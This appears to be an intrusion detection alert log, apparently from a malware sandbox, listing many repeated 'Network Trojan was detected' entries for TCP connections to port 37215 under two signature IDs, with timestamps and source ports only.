              Timestamp:06/13/24-21:31:57.091232
              SID:2829579
              Source Port:54734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074895
              SID:2829579
              Source Port:40504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271380
              SID:2835222
              Source Port:42534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992509
              SID:2829579
              Source Port:56310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.010834
              SID:2829579
              Source Port:50062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060894
              SID:2835222
              Source Port:48764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164231
              SID:2835222
              Source Port:38656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870442
              SID:2835222
              Source Port:40170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.059488
              SID:2829579
              Source Port:42592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091682
              SID:2829579
              Source Port:48344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044590
              SID:2829579
              Source Port:45350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373769
              SID:2835222
              Source Port:46074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212425
              SID:2835222
              Source Port:37798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.784999
              SID:2835222
              Source Port:56206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867803
              SID:2835222
              Source Port:42786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.129779
              SID:2829579
              Source Port:40834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220011
              SID:2835222
              Source Port:46140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100869
              SID:2835222
              Source Port:38962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403598
              SID:2835222
              Source Port:50252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194483
              SID:2835222
              Source Port:43798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308321
              SID:2829579
              Source Port:34334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524502
              SID:2835222
              Source Port:40250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276363
              SID:2835222
              Source Port:40544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.799806
              SID:2829579
              Source Port:58108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568572
              SID:2829579
              Source Port:38490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193960
              SID:2835222
              Source Port:40982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823444
              SID:2829579
              Source Port:42210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097627
              SID:2835222
              Source Port:53500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376677
              SID:2835222
              Source Port:55946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321998
              SID:2829579
              Source Port:33268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408561
              SID:2829579
              Source Port:45850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158494
              SID:2829579
              Source Port:37260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.455733
              SID:2835222
              Source Port:50416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841556
              SID:2835222
              Source Port:53162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544208
              SID:2835222
              Source Port:39588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677871
              SID:2835222
              Source Port:60962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804495
              SID:2835222
              Source Port:34254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.218011
              SID:2829579
              Source Port:58586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506040
              SID:2835222
              Source Port:38528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610506
              SID:2835222
              Source Port:36554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724725
              SID:2835222
              Source Port:46596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275513
              SID:2835222
              Source Port:35164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.726571
              SID:2835222
              Source Port:46972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345723
              SID:2829579
              Source Port:59422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.606929
              SID:2829579
              Source Port:39290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658859
              SID:2835222
              Source Port:53264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370960
              SID:2829579
              Source Port:56900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726310
              SID:2829579
              Source Port:41988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786696
              SID:2835222
              Source Port:37200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227514
              SID:2829579
              Source Port:38072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128811
              SID:2829579
              Source Port:48800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785253
              SID:2829579
              Source Port:42846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309486
              SID:2829579
              Source Port:58086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074588
              SID:2835222
              Source Port:40002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610157
              SID:2835222
              Source Port:56028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248042
              SID:2835222
              Source Port:59070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831133
              SID:2829579
              Source Port:38524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.789967
              SID:2835222
              Source Port:35200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.844006
              SID:2829579
              Source Port:44714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402540
              SID:2829579
              Source Port:44164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654630
              SID:2829579
              Source Port:47158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091972
              SID:2835222
              Source Port:58928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.152739
              SID:2835222
              Source Port:56852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914346
              SID:2829579
              Source Port:55558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042639
              SID:2829579
              Source Port:49344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.094092
              SID:2829579
              Source Port:38582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.753354
              SID:2835222
              Source Port:52854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654816
              SID:2829579
              Source Port:44688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219728
              SID:2835222
              Source Port:57172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408865
              SID:2835222
              Source Port:60574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404493
              SID:2829579
              Source Port:41850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503906
              SID:2829579
              Source Port:59780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091083
              SID:2829579
              Source Port:58292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245111
              SID:2829579
              Source Port:46652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.371819
              SID:2835222
              Source Port:48838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696022
              SID:2829579
              Source Port:50286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543107
              SID:2829579
              Source Port:57946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154290
              SID:2835222
              Source Port:33662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675626
              SID:2829579
              Source Port:39108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454731
              SID:2835222
              Source Port:50814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.990162
              SID:2835222
              Source Port:48836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213507
              SID:2835222
              Source Port:58106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.149176
              SID:2835222
              Source Port:43164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303466
              SID:2829579
              Source Port:58524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273662
              SID:2829579
              Source Port:50190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820025
              SID:2829579
              Source Port:60998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228697
              SID:2835222
              Source Port:43924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972595
              SID:2835222
              Source Port:35762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.754484
              SID:2829579
              Source Port:38196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409389
              SID:2829579
              Source Port:53920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821704
              SID:2829579
              Source Port:40252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127401
              SID:2829579
              Source Port:33346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710703
              SID:2835222
              Source Port:33982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546953
              SID:2835222
              Source Port:35174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528314
              SID:2829579
              Source Port:51836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276503
              SID:2835222
              Source Port:48030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707173
              SID:2835222
              Source Port:57040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404978
              SID:2835222
              Source Port:55854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406488
              SID:2835222
              Source Port:44100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547240
              SID:2835222
              Source Port:50358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568294
              SID:2829579
              Source Port:53988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787204
              SID:2835222
              Source Port:33790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943373
              SID:2829579
              Source Port:48000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039536
              SID:2829579
              Source Port:47070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632605
              SID:2835222
              Source Port:50362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195857
              SID:2829579
              Source Port:39394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153760
              SID:2829579
              Source Port:50772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911261
              SID:2835222
              Source Port:52884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417104
              SID:2835222
              Source Port:53148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197165
              SID:2829579
              Source Port:34388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.305300
              SID:2829579
              Source Port:54922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.015907
              SID:2829579
              Source Port:52846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177063
              SID:2835222
              Source Port:39740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508749
              SID:2829579
              Source Port:53606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159969
              SID:2835222
              Source Port:38420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277418
              SID:2829579
              Source Port:49706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842774
              SID:2835222
              Source Port:42356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176476
              SID:2835222
              Source Port:40114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174810
              SID:2829579
              Source Port:35752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.510238
              SID:2829579
              Source Port:40892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025207
              SID:2829579
              Source Port:40014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278149
              SID:2835222
              Source Port:50684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.510378
              SID:2829579
              Source Port:45936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275546
              SID:2835222
              Source Port:47422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041828
              SID:2829579
              Source Port:44292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.618109
              SID:2829579
              Source Port:36432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253542
              SID:2829579
              Source Port:58080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159660
              SID:2835222
              Source Port:45624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403881
              SID:2829579
              Source Port:33500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.604408
              SID:2829579
              Source Port:34242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303519
              SID:2829579
              Source Port:42024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694743
              SID:2829579
              Source Port:33530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248901
              SID:2829579
              Source Port:56538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403109
              SID:2835222
              Source Port:53100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221931
              SID:2829579
              Source Port:37720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457500
              SID:2829579
              Source Port:54914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173564
              SID:2835222
              Source Port:49032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025319
              SID:2835222
              Source Port:35258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131243
              SID:2829579
              Source Port:56506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195573
              SID:2829579
              Source Port:45402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610575
              SID:2829579
              Source Port:40118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109550
              SID:2829579
              Source Port:51776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045248
              SID:2829579
              Source Port:34352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887820
              SID:2835222
              Source Port:44156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195522
              SID:2835222
              Source Port:60302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.549579
              SID:2829579
              Source Port:38866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660111
              SID:2829579
              Source Port:59958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755673
              SID:2835222
              Source Port:58098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224553
              SID:2829579
              Source Port:47692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993453
              SID:2829579
              Source Port:44328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370797
              SID:2835222
              Source Port:44118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241405
              SID:2829579
              Source Port:43354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294458
              SID:2835222
              Source Port:47970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403213
              SID:2829579
              Source Port:40328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263595
              SID:2835222
              Source Port:41898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220890
              SID:2829579
              Source Port:32782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547443
              SID:2835222
              Source Port:33626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633402
              SID:2829579
              Source Port:49792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040652
              SID:2829579
              Source Port:58956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177191
              SID:2829579
              Source Port:55524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730607
              SID:2829579
              Source Port:54108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438750
              SID:2829579
              Source Port:41644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307892
              SID:2835222
              Source Port:60690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440516
              SID:2835222
              Source Port:60286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912828
              SID:2829579
              Source Port:38458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.932698
              SID:2835222
              Source Port:38906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.338721
              SID:2829579
              Source Port:34390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404567
              SID:2829579
              Source Port:49674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028848
              SID:2835222
              Source Port:51846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676646
              SID:2835222
              Source Port:49838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869936
              SID:2835222
              Source Port:37530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569597
              SID:2835222
              Source Port:41022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502448
              SID:2835222
              Source Port:49516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126206
              SID:2835222
              Source Port:57682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.267622
              SID:2835222
              Source Port:48616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169767
              SID:2829579
              Source Port:34610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992278
              SID:2835222
              Source Port:44230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707929
              SID:2835222
              Source Port:34656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417065
              SID:2829579
              Source Port:53358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822139
              SID:2829579
              Source Port:43180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220656
              SID:2829579
              Source Port:44878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751864
              SID:2829579
              Source Port:51094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869128
              SID:2835222
              Source Port:37448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039609
              SID:2829579
              Source Port:33992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570053
              SID:2835222
              Source Port:35978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656357
              SID:2835222
              Source Port:45134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506447
              SID:2835222
              Source Port:41936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379739
              SID:2829579
              Source Port:33468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611650
              SID:2829579
              Source Port:60984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043736
              SID:2835222
              Source Port:36278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824552
              SID:2835222
              Source Port:40386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219503
              SID:2835222
              Source Port:40070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786364
              SID:2829579
              Source Port:45686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567605
              SID:2829579
              Source Port:45508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092859
              SID:2829579
              Source Port:52596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783633
              SID:2829579
              Source Port:58496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871651
              SID:2829579
              Source Port:42364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658332
